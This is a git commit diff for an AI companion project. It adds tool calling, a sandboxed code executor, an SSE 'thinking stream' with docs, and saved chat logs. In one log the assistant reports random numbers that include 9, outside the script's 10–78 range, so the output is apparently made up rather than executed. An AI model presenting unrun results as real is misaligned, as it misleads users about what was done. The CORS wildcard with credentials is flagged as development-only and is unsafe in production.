feat: Implement Trillium notes executor for searching and creating notes via ETAPI

- Added `trillium.py` for searching and creating notes with Trillium's ETAPI. - Implemented `search_notes` and `create_note` functions with appropriate error handling and validation. feat: Add web search functionality using DuckDuckGo - Introduced `web_search.py` for performing web searches without API keys. - Implemented `search_web` function with result handling and validation. feat: Create provider-agnostic function caller for iterative tool calling - Developed `function_caller.py` to manage LLM interactions with tools. - Implemented iterative calling logic with error handling and tool execution. feat: Establish a tool registry for managing available tools - Created `registry.py` to define and manage tool availability and execution. - Integrated feature flags for enabling/disabling tools based on environment variables. feat: Implement event streaming for tool calling processes - Added `stream_events.py` to manage Server-Sent Events (SSE) for tool calling. - Enabled real-time updates during tool execution for enhanced user experience. test: Add tests for tool calling system components - Created `test_tools.py` to validate functionality of code execution, web search, and tool registry. - Implemented asynchronous tests to ensure proper execution and result handling. chore: Add Dockerfile for sandbox environment setup - Created `Dockerfile` to set up a Python environment with necessary dependencies for code execution. chore: Add debug regex script for testing XML parsing - Introduced `debug_regex.py` to validate regex patterns against XML tool calls. chore: Add HTML template for displaying thinking stream events - Created `test_thinking_stream.html` for visualizing tool calling events in a user-friendly format. test: Add tests for OllamaAdapter XML parsing - Developed `test_ollama_parser.py` to validate XML parsing with various test cases, including malformed XML.
2025-12-26 03:49:20 -05:00
parent f1471cde84
commit 64429b19e6
37 changed files with 3238 additions and 23 deletions
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -9,6 +9,226 @@ Format based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/) and [Se
 ---
 ## [0.8.0] - 2025-12-26
 ### Added - Tool Calling & "Show Your Work" Transparency Feature
 **Tool Calling System (Standard Mode)**
 - **Function Calling Infrastructure** [cortex/autonomy/tools/](cortex/autonomy/tools/)
  - Implemented agentic tool calling for Standard Mode with autonomous multi-step execution
  - Tool registry system with JSON schema definitions
  - Adapter pattern for provider-agnostic tool calling (OpenAI, Ollama, llama.cpp)
  - Maximum 5 iterations per request to prevent runaway loops
 - **Available Tools**
  - `execute_code` - Sandboxed Python/JavaScript/Bash execution via Docker
  - `web_search` - Tavily API integration for real-time web queries
  - `trillium_search` - Internal Trillium knowledge base queries
 - **Provider Adapters** [cortex/autonomy/tools/adapters/](cortex/autonomy/tools/adapters/)
  - `OpenAIAdapter` - Native function calling support
  - `OllamaAdapter` - XML-based tool calling for local models
  - `LlamaCppAdapter` - XML-based tool calling for llama.cpp backend
  - Automatic tool call parsing and result formatting
 - **Code Execution Sandbox** [cortex/autonomy/tools/code_executor.py](cortex/autonomy/tools/code_executor.py)
  - Docker-based isolated execution environment
  - Support for Python, JavaScript (Node.js), and Bash
  - 30-second timeout with automatic cleanup
  - Returns stdout, stderr, exit code, and execution time
  - Prevents filesystem access outside sandbox
 **"Show Your Work" - Real-Time Thinking Stream**
 - **Server-Sent Events (SSE) Streaming** [cortex/router.py:478-527](cortex/router.py#L478-L527)
  - New `/stream/thinking/{session_id}` endpoint for real-time event streaming
  - Broadcasts internal thinking process during tool calling operations
  - 30-second keepalive with automatic reconnection support
  - Events: `connected`, `thinking`, `tool_call`, `tool_result`, `done`, `error`
 - **Stream Manager** [cortex/autonomy/tools/stream_events.py](cortex/autonomy/tools/stream_events.py)
  - Pub/sub system for managing SSE subscriptions per session
  - Multiple clients can connect to same session stream
  - Automatic cleanup of dead queues and closed connections
  - Zero overhead when no subscribers active
 - **FunctionCaller Integration** [cortex/autonomy/tools/function_caller.py](cortex/autonomy/tools/function_caller.py)
  - Enhanced with event emission at each step:
    - "thinking" events before each LLM call
    - "tool_call" events when invoking tools
    - "tool_result" events after tool execution
    - "done" event with final answer
    - "error" events on failures
  - Session-aware streaming (only emits when subscribers exist)
  - Provider-agnostic implementation works with all backends
 - **Thinking Stream UI** [core/ui/thinking-stream.html](core/ui/thinking-stream.html)
  - Dedicated popup window for real-time thinking visualization
  - Color-coded events: green (thinking), orange (tool calls), blue (results), purple (done), red (errors)
  - Auto-scrolling event feed with animations
  - Connection status indicator with green/red dot
  - Clear events button and session info display
  - Mobile-friendly responsive design
 - **UI Integration** [core/ui/index.html](core/ui/index.html)
  - "🧠 Show Work" button in session selector
  - Opens thinking stream in popup window
  - Session ID passed via URL parameter for stream association
  - Purple/violet button styling to match cyberpunk theme
 **Tool Calling Configuration**
 - **Environment Variables** [.env](.env)
  - `STANDARD_MODE_ENABLE_TOOLS=true` - Enable/disable tool calling
  - `TAVILY_API_KEY` - API key for web search tool
  - `TRILLIUM_API_URL` - URL for Trillium knowledge base
 - **Standard Mode Tools Toggle** [cortex/router.py:389-470](cortex/router.py#L389-L470)
  - `/simple` endpoint checks `STANDARD_MODE_ENABLE_TOOLS` environment variable
  - Falls back to non-tool mode if disabled
  - Logs tool usage statistics (iterations, tools used)
 ### Changed - CORS & Architecture
 **CORS Support for SSE**
 - **Added CORS Middleware** [cortex/main.py](cortex/main.py)
  - FastAPI CORSMiddleware with wildcard origins for development
  - Allows cross-origin SSE connections from nginx UI (port 8081) to cortex (port 7081)
  - Credentials support enabled for authenticated requests
  - All methods and headers permitted
 **Tool Calling Pipeline**
 - **Standard Mode Enhancement** [cortex/router.py:389-470](cortex/router.py#L389-L470)
  - `/simple` endpoint now supports optional tool calling
  - Multi-iteration agentic loop with LLM + tool execution
  - Tool results injected back into conversation for next iteration
  - Graceful degradation to non-tool mode if tools disabled
 **JSON Response Formatting**
 - **SSE Event Structure** [cortex/router.py:497-499](cortex/router.py#L497-L499)
  - Fixed initial "connected" event to use proper JSON serialization
  - Changed from f-string with nested quotes to `json.dumps()`
  - Ensures valid JSON for all event types
 ### Fixed - Critical JavaScript & SSE Issues
 **JavaScript Variable Scoping Bug**
 - **Root cause**: `eventSource` variable used before declaration in [thinking-stream.html:218](core/ui/thinking-stream.html#L218)
 - **Symptom**: `Uncaught ReferenceError: can't access lexical declaration 'eventSource' before initialization`
 - **Solution**: Moved variable declarations before `connectStream()` call
 - **Impact**: Thinking stream page now loads without errors and establishes SSE connection
 **SSE Connection Not Establishing**
 - **Root cause**: CORS blocked cross-origin SSE requests from nginx (8081) to cortex (7081)
 - **Symptom**: Browser silently blocked EventSource connection, no errors in console
 - **Solution**: Added CORSMiddleware to cortex FastAPI app
 - **Impact**: SSE streams now connect successfully across ports
 **Invalid JSON in SSE Events**
 - **Root cause**: Initial "connected" event used f-string with nested quotes: `f"data: {{'type': 'connected', 'session_id': '{session_id}'}}\n\n"`
 - **Symptom**: Browser couldn't parse malformed JSON, connection appeared stuck on "Connecting..."
 - **Solution**: Used `json.dumps()` for proper JSON serialization
 - **Impact**: Connected event now parsed correctly, status updates to green dot
 ### Technical Improvements
 **Agentic Architecture**
 - Multi-iteration reasoning loop with tool execution
 - Provider-agnostic tool calling via adapter pattern
 - Automatic tool result injection into conversation context
 - Iteration limits to prevent infinite loops
 - Comprehensive logging at each step
 **Event Streaming Performance**
 - Zero overhead when no subscribers (check before emit)
 - Efficient pub/sub with asyncio queues
 - Automatic cleanup of disconnected clients
 - 30-second keepalive prevents timeout issues
 - Session-isolated streams prevent cross-talk
 **Code Quality**
 - Clean separation: tool execution, adapters, streaming, UI
 - Comprehensive error handling with fallbacks
 - Detailed logging for debugging tool calls
 - Type hints and docstrings throughout
 - Modular design for easy extension
 **Security**
 - Sandboxed code execution prevents filesystem access
 - Timeout limits prevent resource exhaustion
 - Docker isolation for untrusted code
 - No code execution without explicit user request
 ### Architecture - Tool Calling Flow
 **Standard Mode with Tools:**
 ```
 User (UI) → Relay → Cortex /simple
  ↓
  Check STANDARD_MODE_ENABLE_TOOLS
  ↓
  LLM generates tool call → FunctionCaller
  ↓
  Execute tool (Docker sandbox / API call)
  ↓
  Inject result → LLM (next iteration)
  ↓
  Repeat until done or max iterations
  ↓
  Return final answer → UI
 ```
 **Thinking Stream Flow:**
 ```
 Browser → nginx:8081 → thinking-stream.html
  ↓
 EventSource connects to cortex:7081/stream/thinking/{session_id}
  ↓
 ToolStreamManager.subscribe(session_id) → asyncio.Queue
  ↓
 User sends message → /simple endpoint
  ↓
 FunctionCaller emits events:
  - emit("thinking") → Queue → SSE → Browser
  - emit("tool_call") → Queue → SSE → Browser
  - emit("tool_result") → Queue → SSE → Browser
  - emit("done") → Queue → SSE → Browser
  ↓
 Browser displays color-coded events in real-time
 ```
 ### Documentation
 - **Added** [THINKING_STREAM.md](THINKING_STREAM.md) - Complete guide to "Show Your Work" feature
  - Usage examples with curl
  - Event type reference
  - Architecture diagrams
  - Demo page instructions
 - **Added** [UI_THINKING_STREAM.md](UI_THINKING_STREAM.md) - UI integration documentation
  - Button placement and styling
  - Popup window behavior
  - Session association logic
 ### Known Limitations
 **Tool Calling:**
 - Limited to 5 iterations per request (prevents runaway loops)
 - Python sandbox has no filesystem persistence (temporary only)
 - Web search requires Tavily API key (not free tier unlimited)
 - Trillium search requires separate knowledge base setup
 **Thinking Stream:**
 - CORS wildcard (`*`) is development-only (should restrict in production)
 - Stream ends after "done" event (must reconnect for new request)
 - No historical replay (only shows real-time events)
 - Single session per stream window
 ### Migration Notes
 **For Users Upgrading:**
 1. New environment variable: `STANDARD_MODE_ENABLE_TOOLS=true` (default: enabled)
 2. Thinking stream accessible via "🧠 Show Work" button in UI
 3. Tool calling works automatically in Standard Mode when enabled
 4. No changes required to existing Standard Mode usage
 **For Developers:**
 1. Cortex now includes CORS middleware for SSE
 2. New `/stream/thinking/{session_id}` endpoint available
 3. FunctionCaller requires `session_id` parameter for streaming
 4. Tool adapters can be extended by adding to `AVAILABLE_TOOLS` registry
 ---
 ## [0.7.0] - 2025-12-21
 ### Added - Standard Mode & UI Enhancements
--- a/README.md
+++ b/README.md
@@ -1,12 +1,12 @@
-# Project Lyra - README v0.7.0
+# Project Lyra - README v0.8.0
 Lyra is a modular persistent AI companion system with advanced reasoning capabilities and autonomous decision-making.
 It provides memory-backed chat using **Relay** + **Cortex** with integrated **Autonomy System**,
 featuring a multi-stage reasoning pipeline powered by HTTP-based LLM backends.
-**NEW in v0.7.0:** Standard Mode for simple chatbot functionality + UI backend selection + server-side session persistence
+**NEW in v0.8.0:** Agentic tool calling + "Show Your Work" real-time thinking stream visualization
-**Current Version:** v0.7.0 (2025-12-21)
+**Current Version:** v0.8.0 (2025-12-26)
 > **Note:** As of v0.6.0, NeoMem is **disabled by default** while we work out integration hiccups in the pipeline. The autonomy system is being refined independently before full memory integration.
@@ -33,11 +33,16 @@ Project Lyra operates as a **single docker-compose deployment** with multiple Do
 - Manages async calls to Cortex ingest
 - *(NeoMem integration currently disabled in v0.6.0)*
-**2. UI** (Static HTML)
+**2. UI** (Static HTML) - Port 8081 (nginx)
 - Browser-based chat interface with cyberpunk theme
- **NEW:** Mode selector (Standard/Cortex) in header
+- Mode selector (Standard/Cortex) in header
- **NEW:** Settings modal with backend selection and session management
+- Settings modal with backend selection and session management
- **NEW:** Light/Dark mode toggle (dark by default)
+- Light/Dark mode toggle (dark by default)
 - **NEW in v0.8.0:** "🧠 Show Work" button for real-time thinking stream
  - Opens popup window with live SSE connection
  - Color-coded events: thinking, tool calls, results, completion
  - Auto-scrolling with animations
  - Session-aware (matches current chat session)
 - Server-synced session management (persists across browsers and reboots)
 - OpenAI-compatible message format
@@ -55,11 +60,19 @@ Project Lyra operates as a **single docker-compose deployment** with multiple Do
 - Primary reasoning engine with multi-stage pipeline and autonomy system
 - **Includes embedded Intake module** (no separate service as of v0.5.1)
 - **Integrated Autonomy System** (NEW in v0.6.0) - See Autonomy System section below
 - **Tool Calling System** (NEW in v0.8.0) - Agentic execution for Standard Mode
  - Sandboxed code execution (Python, JavaScript, Bash)
  - Web search via Tavily API
  - Trillium knowledge base integration
  - Multi-iteration autonomous tool use (max 5 iterations)
  - Real-time thinking stream via SSE
 - **Dual Operating Modes:**
-  - **Standard Mode** (NEW in v0.7.0) - Simple chatbot with context retention
+  - **Standard Mode** (v0.7.0) - Simple chatbot with context retention + tool calling (v0.8.0)
    - Bypasses reflection, reasoning, refinement stages
    - Direct LLM call with conversation history
    - User-selectable backend (SECONDARY, OPENAI, or custom)
    - **NEW:** Autonomous tool calling for code execution, web search, knowledge queries
    - **NEW:** "Show Your Work" real-time thinking stream
    - Faster responses for coding and practical tasks
  - **Cortex Mode** - Full 4-stage reasoning pipeline
    1. **Reflection** - Generates meta-awareness notes about conversation
@@ -70,7 +83,8 @@ Project Lyra operates as a **single docker-compose deployment** with multiple Do
 - Flexible LLM router supporting multiple backends via HTTP
 - **Endpoints:**
  - `POST /reason` - Main reasoning pipeline (Cortex Mode)
-  - `POST /simple` - Direct LLM chat (Standard Mode) **NEW in v0.7.0**
+  - `POST /simple` - Direct LLM chat with tool calling (Standard Mode)
  - `GET /stream/thinking/{session_id}` - SSE stream for thinking events **NEW in v0.8.0**
  - `POST /ingest` - Receives conversation exchanges from Relay
  - `GET /health` - Service health check
  - `GET /debug/sessions` - Inspect in-memory SESSIONS state
--- a/THINKING_STREAM.md
+++ b/THINKING_STREAM.md
@@ -0,0 +1,163 @@
 # "Show Your Work" - Thinking Stream Feature
 Real-time Server-Sent Events (SSE) stream that broadcasts the internal thinking process during tool calling operations.
 ## What It Does
 When Lyra uses tools to answer a question, you can now watch her "think" in real-time through a parallel stream:
 - 🤔 **Thinking** - When she's planning what to do
 - 🔧 **Tool Calls** - When she decides to use a tool
 - 📊 **Tool Results** - The results from tool execution
 - ✅ **Done** - When she has the final answer
 - ❌ **Errors** - If something goes wrong
 ## How To Use
 ### 1. Open the SSE Stream
 Connect to the thinking stream for a session:
 ```bash
 curl -N http://localhost:7081/stream/thinking/{session_id}
 ```
 The stream will send Server-Sent Events in this format:
 ```
 data: {"type": "thinking", "data": {"message": "🤔 Thinking... (iteration 1/5)"}}
 data: {"type": "tool_call", "data": {"tool": "execute_code", "args": {...}, "message": "🔧 Using tool: execute_code"}}
 data: {"type": "tool_result", "data": {"tool": "execute_code", "result": {...}, "message": "📊 Result: ..."}}
 data: {"type": "done", "data": {"message": "✅ Complete!", "final_answer": "The result is..."}}
 ```
 ### 2. Send a Request
 In parallel, send a request to `/simple` with the same `session_id`:
 ```bash
 curl -X POST http://localhost:7081/simple \
  -H "Content-Type: application/json" \
  -d '{
    "session_id": "your-session-id",
    "user_prompt": "Calculate 50/2 using Python",
    "backend": "SECONDARY"
  }'
 ```
 ### 3. Watch the Stream
 As the request processes, you'll see real-time events showing:
 - Each thinking iteration
 - Every tool call being made
 - The results from each tool
 - The final answer
 ## Event Types
 | Event Type | Description | Data Fields |
 |-----------|-------------|-------------|
 | `connected` | Initial connection | `session_id` |
 | `thinking` | LLM is processing | `message` |
 | `tool_call` | Tool is being invoked | `tool`, `args`, `message` |
 | `tool_result` | Tool execution completed | `tool`, `result`, `message` |
 | `done` | Process complete | `message`, `final_answer` |
 | `error` | Something went wrong | `message` |
 ## Demo Page
 A demo HTML page is included at [test_thinking_stream.html](../test_thinking_stream.html):
 ```bash
 # Serve the demo page
 python3 -m http.server 8000
 ```
 Then open http://localhost:8000/test_thinking_stream.html in your browser.
 The demo shows:
 - **Left panel**: Chat interface
 - **Right panel**: Real-time thinking stream
 - **Mobile**: Swipe between panels
 ## Architecture
 ### Components
 1. **ToolStreamManager** (`autonomy/tools/stream_events.py`)
   - Manages SSE subscriptions per session
   - Broadcasts events to all connected clients
   - Handles automatic cleanup
 2. **FunctionCaller** (`autonomy/tools/function_caller.py`)
   - Enhanced with event emission at each step
   - Checks for active subscribers before emitting
   - Passes `session_id` through the call chain
 3. **SSE Endpoint** (`/stream/thinking/{session_id}`)
   - FastAPI streaming response
   - 30-second keepalive for connection maintenance
   - Automatic reconnection on client side
 ### Event Flow
 ```
 Client                 SSE Endpoint           FunctionCaller          Tools
  |                         |                         |                  |
  |--- Connect SSE -------->|                         |                  |
  |<-- connected ----------|                          |                  |
  |                         |                         |                  |
  |--- POST /simple --------|                         |                  |
  |                         |                         |                  |
  |                         |<-- emit("thinking") ---|                  |
  |<-- thinking ------------|                         |                  |
  |                         |                         |                  |
  |                         |<-- emit("tool_call") ---|                  |
  |<-- tool_call -----------|                         |                  |
  |                         |                         |-- execute ------>|
  |                         |                         |<-- result -------|
  |                         |<-- emit("tool_result")--|                  |
  |<-- tool_result ---------|                         |                  |
  |                         |                         |                  |
  |                         |<-- emit("done") --------|                  |
  |<-- done ---------------|                         |                  |
  |                         |                         |                  |
 ```
 ## Configuration
 No additional configuration needed! The feature works automatically when:
 1. `STANDARD_MODE_ENABLE_TOOLS=true` (already set)
 2. A client connects to the SSE stream BEFORE sending the request
 ## Example Output
 ```
 🟢 Connected to thinking stream
 ✓ Connected (Session: thinking-demo-1735177234567)
 🤔 Thinking... (iteration 1/5)
 🔧 Using tool: execute_code
 📊 Result: {'stdout': '12.0\n', 'stderr': '', 'exit_code': 0, 'execution_time': 0.04}
 🤔 Thinking... (iteration 2/5)
 ✅ Complete!
 ```
 ## Use Cases
 - **Debugging**: See exactly what tools are being called and why
 - **Transparency**: Show users what the AI is doing behind the scenes
 - **Education**: Learn how the system breaks down complex tasks
 - **UI Enhancement**: Create engaging "thinking" animations
 - **Mobile App**: Separate tab for "Show Your Work" view
 ## Future Enhancements
 Potential additions:
 - Token usage per iteration
 - Estimated time remaining
 - Tool execution duration
 - Intermediate reasoning steps
 - Visual progress indicators
--- a/UI_THINKING_STREAM.md
+++ b/UI_THINKING_STREAM.md
@@ -0,0 +1,109 @@
 # Thinking Stream UI Integration
 ## What Was Added
 Added a "🧠 Show Work" button to the main chat interface that opens a dedicated thinking stream window.
 ## Changes Made
 ### 1. Main Chat Interface ([core/ui/index.html](core/ui/index.html))
 Added button to session selector:
 ```html
 <button id="thinkingStreamBtn" title="Show thinking stream in new window">🧠 Show Work</button>
 ```
 Added event listener to open stream window:
 ```javascript
 document.getElementById("thinkingStreamBtn").addEventListener("click", () => {
  const streamUrl = `/thinking-stream.html?session=${currentSession}`;
  const windowFeatures = "width=600,height=800,menubar=no,toolbar=no,location=no,status=no";
  window.open(streamUrl, `thinking_${currentSession}`, windowFeatures);
 });
 ```
 ### 2. Thinking Stream Window ([core/ui/thinking-stream.html](core/ui/thinking-stream.html))
 New dedicated page for the thinking stream:
 - **Header**: Shows connection status with live indicator
 - **Events Area**: Scrollable list of thinking events
 - **Footer**: Clear button and session info
 Features:
 - Auto-reconnecting SSE connection
 - Color-coded event types
 - Slide-in animations for new events
 - Automatic scrolling to latest event
 - Session ID from URL parameter
 ### 3. Styling ([core/ui/style.css](core/ui/style.css))
 Added purple/violet theme for the thinking button:
 ```css
 #thinkingStreamBtn {
  background: rgba(138, 43, 226, 0.2);
  border-color: #8a2be2;
 }
 ```
 ## How To Use
 1. **Open Chat Interface**
   - Navigate to http://localhost:7078 (relay)
   - Select or create a session
 2. **Open Thinking Stream**
   - Click the "🧠 Show Work" button
   - A new window opens showing the thinking stream
 3. **Send a Message**
   - Type a message that requires tools (e.g., "Calculate 50/2 in Python")
   - Watch the thinking stream window for real-time updates
 4. **Observe Events**
   - 🤔 Thinking iterations
   - 🔧 Tool calls
   - 📊 Tool results
   - ✅ Completion
 ## Event Types & Colors
 | Event | Icon | Color | Description |
 |-------|------|-------|-------------|
 | Connected | ✓ | Green | Stream established |
 | Thinking | 🤔 | Light Green | LLM processing |
 | Tool Call | 🔧 | Orange | Tool invocation |
 | Tool Result | 📊 | Blue | Tool output |
 | Done | ✅ | Purple | Task complete |
 | Error | ❌ | Red | Something failed |
 ## Architecture
 ```
 User clicks "Show Work"
        ↓
 Opens thinking-stream.html?session=xxx
        ↓
 Connects to SSE: /stream/thinking/{session}
        ↓
 User sends message in main chat
        ↓
 FunctionCaller emits events
        ↓
 Events appear in thinking stream window
 ```
 ## Mobile Support
 The thinking stream window is responsive:
 - Desktop: Side-by-side windows
 - Mobile: Use browser's tab switcher to swap between chat and thinking stream
 ## Future Enhancements
 Potential improvements:
 - **Embedded panel**: Option to show thinking stream in a split panel within main UI
 - **Event filtering**: Toggle event types on/off
 - **Export**: Download thinking trace as JSON
 - **Replay**: Replay past thinking sessions
 - **Statistics**: Show timing, token usage per step
--- a/core/relay/sessions/sess-b8juuil4.json
+++ b/core/relay/sessions/sess-b8juuil4.json
@@ -0,0 +1,58 @@
 [
  {
    "role": "user",
    "content": "hello! can you make a little python script for me? I dont care what it does, you pick!"
  },
  {
    "role": "assistant",
    "content": "Sure! I've created a simple Python script that generates and prints a list of random numbers. Here's what it does:\n\n```python\nimport random\n\n# Generate a list of 10 random integers between 10 and 78\nrandom_numbers = [random.randint(10, 78) for _ in range(10)]\nprint(random_numbers)\n```\n\nThis script uses Python's `random` module to generate a list of 10 random numbers between 10 and 78. Here are the generated numbers:\n\n[60, 12, 63, 10, 18, 77, 68, 38, 60, 9]\n\nIf you'd like to see a different kind of script or have any specific requirements for future scripts, feel free to let me know!"
  },
  {
    "role": "user",
    "content": "have you heard of escape from tarkov?"
  },
  {
    "role": "assistant",
    "content": "Yes, I've heard of Escape from Tarkov. It's an online multiplayer first-person shooter video game known for its realism and complex mechanics. Would you like more information about the game or help with something specific related to it?"
  },
  {
    "role": "user",
    "content": "do you think you could write a program to help me keep track of tasks?"
  },
  {
    "role": "assistant",
    "content": "Sure! I can create a simple Python script that helps you keep track of your tasks using a basic text file. The script will allow you to add, list, and remove tasks.\n\nHere's the script:\n\n```python\ndef save_tasks(tasks):\n    with open(\"tasks.txt\", \"w\") as file:\n        for task in tasks:\n            file.write(f\"{task}\\n\")\n\ndef load_tasks():\n    try:\n        with open(\"tasks.txt\", \"r\") as file:\n            return [line.strip() for line in file.readlines()]\n    except FileNotFoundError:\n        return []\n\ndef add_task(task, tasks):\n    tasks.append(task)\n    save_tasks(tasks)\n\ndef list_tasks(tasks):\n    if not tasks:\n        print(\"No tasks to display.\")\n    else:\n        print(\"Your tasks are:\")\n        for index, task in enumerate(tasks, start=1):\n            print(f\"{index}. {task}\")\n\ndef remove_task(index, tasks):\n    if 0 < index <= len(tasks):\n        removed_task = tasks.pop(index - 1)\n        save_tasks(tasks)\n        return removed_task\n    else:\n        return None\n\ntasks = load_tasks()\n\nprint(\"Welcome to your Task Manager!\")\nwhile True:\n    print(\"\\nOptions:\")\n    print(\"1. Add task\")\n    print(\"2. List tasks\")\n    print(\"3. Remove task\")\n    print(\"4. Exit\")\n\n    choice = input(\"Choose an option: \")\n\n    if choice == \"1\":\n        task = input(\"Enter the new task: \")\n        add_task(task, tasks)\n    elif choice == \"2\":\n        list_tasks(tasks)\n    elif choice == \"3\":\n        index = int(input(\"Enter the number of the task to remove: \"))\n        removed_task = remove_task(index, tasks)\n        if removed_task:\n            print(f\"Removed task: {removed_task}\")\n        else:\n            print(\"Invalid task number.\")\n    elif choice == \"4\":\n        break\n    else:\n        print(\"Invalid option. Please choose again.\")\n\nprint(\"Goodbye!\")\n```\n\nTo use this script:\n1. Save the code to a file, for example `task_manager.py`.\n2. Run the script using Python.\n\nThis script will manage your tasks by saving them to a text file (`tasks.txt`). You can add, list, and remove tasks through the interactive menu.\n\nWould you like me to run this script for you or provide further instructions on how to use it?"
  },
  {
    "role": "user",
    "content": "sure run it for me"
  },
  {
    "role": "assistant",
    "content": "It seems there is still an issue with the way the code is being formatted and executed. Let's try a different approach by running the script in a more straightforward manner.\n\nHere is the correctly formatted task manager script again:\n\n```python\ndef save_tasks(tasks):\n    with open(\"tasks.txt\", \"w\") as file:\n        for task in tasks:\n            file.write(f\"{task}\\n\")\n\ndef load_tasks():\n    try:\n        with open(\"tasks.txt\", \"r\") as file:\n            return [line.strip() for line in file.readlines()]\n    except FileNotFoundError:\n        return []\n\ndef add_task(task, tasks):\n    tasks.append(task)\n    save_tasks(tasks)\n\ndef list_tasks(tasks):\n    if not tasks:\n        print(\"No tasks to display.\")\n    else:\n        print(\"Your tasks are:\")\n        for index, task in enumerate(tasks, start=1):\n            print(f\"{index}. {task}\")\n\ndef remove_task(index, tasks):\n    if 0 < index <= len(tasks):\n        removed_task = tasks.pop(index - 1)\n        save_tasks(tasks)\n        return removed_task\n    else:\n        return None\n\ntasks = load_tasks()\n\nprint(\"Welcome to your Task Manager!\")\nwhile True:\n    print(\"\\nOptions:\")\n    print(\"1. Add task\")\n    print(\"2. List tasks\")\n    print(\"3. Remove task\")\n    print(\"4. Exit\")\n\n    choice = input(\"Choose an option: \")\n\n    if choice == \"1\":\n        task = input(\"Enter the new task: \")\n        add_task(task, tasks)\n    elif choice == \"2\":\n        list_tasks(tasks)\n    elif choice == \"3\":\n        index = int(input(\"Enter the number of the task to remove: \"))\n        removed_task = remove_task(index, tasks)\n        if removed_task:\n            print(f\"Removed task: {removed_task}\")\n        else:\n            print(\"Invalid task number.\")\n    elif choice == \"4\":\n        break\n    else:\n        print(\"Invalid option. Please choose again.\")\n\nprint(\"Goodbye!\")\n```\n\nI will now execute this script correctly using the `execute_code` tool."
  },
  {
    "role": "user",
    "content": "lets test your coding environment. Can you just calculate 50/2 using python?"
  },
  {
    "role": "assistant",
    "content": "It appears there is a persistent issue with the code string formatting in this environment. Let's simplify it and directly execute the Python code without any additional characters:\n\n```python\nresult = 50 / 2\nprint(result)\n```\n\nI'll try executing this code again."
  },
  {
    "role": "user",
    "content": "how about now? Can you run a python scrpit?"
  },
  {
    "role": "assistant",
    "content": "Sure! I can help you run a Python script. Do you have any specific Python code you'd like to execute, or should I demonstrate with a simple example? If so, please provide the code or let me know what you want to achieve."
  },
  {
    "role": "user",
    "content": "just do a simple calculation. 50/2 using python"
  },
  {
    "role": "assistant",
    "content": "The result of the calculation \\( \\frac{50}{2} \\) is \\( 25.0 \\)."
  }
 ]
--- a/core/relay/sessions/sess-b8juuil4.meta.json
+++ b/core/relay/sessions/sess-b8juuil4.meta.json
@@ -0,0 +1 @@
 {}
--- a/core/relay/sessions/sess-dnm44wyb.json
+++ b/core/relay/sessions/sess-dnm44wyb.json
@@ -22,5 +22,37 @@
  {
    "role": "assistant",
    "content": "Sure thing, Brian! I can help you with Python scripting. What specifically do you need assistance with? Whether it's a simple script or something more complex, just let me know the details!"
  },
  {
    "role": "user",
    "content": "im wanting to make some toolls for an AI agent to use."
  },
  {
    "role": "assistant",
    "content": "Great! To get started, what kind of tools are you thinking about creating for your AI agent? Are they related to data processing, decision-making, or something else? Providing more details will help me assist you better."
  },
  {
    "role": "user",
    "content": "dscision making"
  },
  {
    "role": "assistant",
    "content": "Got it! For decision-making tools, you might want to consider scripts that handle conditional logic, use machine learning models for predictions, or integrate with other AI services. Do you have a specific scenario in mind, such as deciding based on user input or data analysis? Let me know the details so I can provide more tailored assistance."
  },
  {
    "role": "user",
    "content": "Im thinking some kind of orchestrator, i ask the agent to do something and it figures out how to do it"
  },
  {
    "role": "assistant",
    "content": "That sounds like a great idea! An orchestrator for your AI agent could involve scripting logic that coordinates different tasks based on user requests. Here’s a simple example using Python:\n\n```python\ndef task_orchestrator(request):\n    # Define the tasks\n    tasks = {\n        'search': search_function,\n        'analyze_data': analyze_data_function,\n        'send_email': send_email_function,\n        'execute_script': execute_script_function\n    }\n    \n    # Check if the request is valid\n    if request in tasks:\n        task = tasks[request]\n        result = task()\n        return result\n    else:\n        return \"Invalid request\"\n\ndef search_function():\n    print(\"Searching...\")\n    return \"Search completed.\"\n\ndef analyze_data_function():\n    print(\"Analyzing data...\")\n    return \"Data analysis complete.\"\n\ndef send_email_function():\n    print(\"Sending email...\")\n    return \"Email sent.\"\n\ndef execute_script_function():\n    print(\"Executing script...\")\n    return \"Script executed.\"\n\n# Example usage\nrequest = input(\"Enter a task (search, analyze_data, send_email, execute_script): \")\nresult = task_orchestrator(request)\nprint(result)\n```\n\nThis script defines an orchestrator function `task_orchestrator` that maps user requests to specific functions. You can expand this by adding more tasks and complexity as needed.\n\nDo you want to add more features or modify this example in any way?"
  },
  {
    "role": "user",
    "content": "can you write me a full program?"
  },
  {
    "role": "assistant",
    "content": "Certainly! Here’s a more comprehensive Python script for an orchestrator that handles different tasks based on user input. This example includes functions for searching, analyzing data, sending emails, and executing scripts.\n\n```python\ndef search_function(query):\n    print(f\"Searching for: {query}\")\n    return f\"Search results for '{query}'\"\n\ndef analyze_data_function(data):\n    print(\"Analyzing data...\")\n    # Simulate some analysis\n    result = \"Data analysis complete.\"\n    return result\n\ndef send_email_function(to, subject, body):\n    print(f\"Sending email to {to} with subject: {subject}\")\n    return f\"Email sent to {to}\"\n\ndef execute_script_function(script_path):\n    print(f\"Executing script at path: {script_path}\")\n    # Simulate execution\n    result = \"Script executed.\"\n    return result\n\ndef task_orchestrator(request, *args, **kwargs):\n    tasks = {\n        'search': search_function,\n        'analyze_data': analyze_data_function,\n        'send_email': send_email_function,\n        'execute_script': execute_script_function\n    }\n    \n    if request in tasks:\n        func = tasks[request]\n        return func(*args, **kwargs)\n    else:\n        return \"Invalid request\"\n\n# Example usage\nif __name__ == \"__main__\":\n    while True:\n        request = input(\"Enter a task (search, analyze_data, send_email, execute_script) or 'exit' to quit: \")\n        if request.lower() == 'exit':\n            break\n        \n        # Determine the function and arguments based on the request\n        if request == 'search':\n            query = input(\"Enter search query: \")\n            result = task_orchestrator(request, query)\n        elif request == 'analyze_data':\n            data = input(\"Enter data to analyze (or leave blank): \")\n            result = task_orchestrator(request, data)\n        elif request == 'send_email':\n            to = input(\"Enter recipient email: \")\n            subject = input(\"Enter email subject: \")\n            body = input(\"Enter email body: \")\n            result = task_orchestrator(request, to, subject, body)\n        elif request == 'execute_script':\n            script_path = input(\"Enter path to script: \")\n            result = task_orchestrator(request, script_path)\n        \n        print(result)\n```\n\nThis program includes:\n- A `task_orchestrator` function that maps user requests to specific functions.\n- Example functions for searching, analyzing data, sending emails, and executing scripts.\n- Interactive input prompts to guide the user through different tasks.\n\nYou can run this script in your Python environment. It will prompt you to enter a task and then provide additional details as needed for each task.\n\nDo you have 